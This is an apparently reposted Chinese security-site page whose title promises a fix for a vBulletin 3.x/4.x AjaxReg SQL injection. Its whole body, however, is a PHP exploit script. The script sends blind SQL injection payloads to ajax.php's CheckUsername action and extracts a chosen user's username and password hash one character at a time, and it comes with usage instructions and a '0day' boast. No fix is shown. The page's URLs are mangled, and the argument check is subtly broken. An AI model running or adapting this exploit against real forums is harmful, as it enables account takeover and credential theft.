vBulletin 3.x / 4.x AjaxReg SQL注射及修复 - 网站安全

#!/usr/bin/php

<?

 

# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit

# https://lh3.googleusercontent测试数据/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png

# livedemo : http://HdhCmsTestyoutube测试数据/watch?v=LlKaYyJxH7E

# check it : http://HdhCmsTest2cto测试数据 /vBulletin/clientscript/register.js

 

function usage ()

{

    echo

        "\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".

        "\n[+] Author: Cold z3ro".

        "\n[+] Site  : http://HdhCmsTesthackteach.org | http://HdhCmsTests3curi7y测试数据".

        "\n[+] vandor: http://HdhCmsTestvbulletin.org/forum/showthread.php?t=144869".

        "\n[+] Usage : php 0day.php <hostname> <path> [userid] [key]".

        "\n[+] Ex.   : php 0day.php localhost /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz".

        "\n[+] Note. : Its a 0day exploit\n\n";

    exit ();

}

 

function check ($hostname, $path, $field, $pos, $usid, $char)

{

    $char = ord ($char);

    $inj = 'ajax.php?do=CheckUsername&param=';

  $inj.= "admin'+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*";

  $culr = $hostname.$path.$inj;

  $curl = curl_init();

  curl_setopt ($curl, CURLOPT_URL, $culr );

  curl_setopt($curl, CURLOPT_HEADER, 1);

  curl_setopt($curl, CURLOPT_VERBOSE, 0);

    ob_start();

    curl_exec ($curl);

    curl_close ($curl);

    $con = ob_get_contents();

    ob_end_clean();

  if(eregi('Invalid',$con))

      return true;

    else

        return false;

}

 

 

function brutechar ($hostname, $path, $field, $usid, $key)

{

    $pos = 1;

    $chr = 0;

    while ($chr < strlen ($key))

    {

        if (check ($hostname, $path, $field, $pos, $usid, $key [$chr]))

        {

            echo $key [$chr];

            $chr = -1;

            $pos++;

        }

        $chr++;

    }

}

 

 

if (count ($argv) != 4)

    usage ();

 

$hostname = $argv [1];

$path = $argv [2];

$usid = $argv [3];

$key = $argv [4];

if (empty ($key))

    $key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";

 

echo "[+] Username: ";

brutechar ($hostname, $path, "username", $usid, $key);

echo "\n[+] Password: ";

brutechar ($hostname, $path, "password", $usid, $key);

echo "\n[+] Done..";

echo "\n[+] It's not fake, its real.";

# word to 1337day测试数据, stop scaming me

 

?>

查看更多关于vBulletin 3.x / 4.x AjaxReg SQL注射及修复 - 网站安全的详细内容...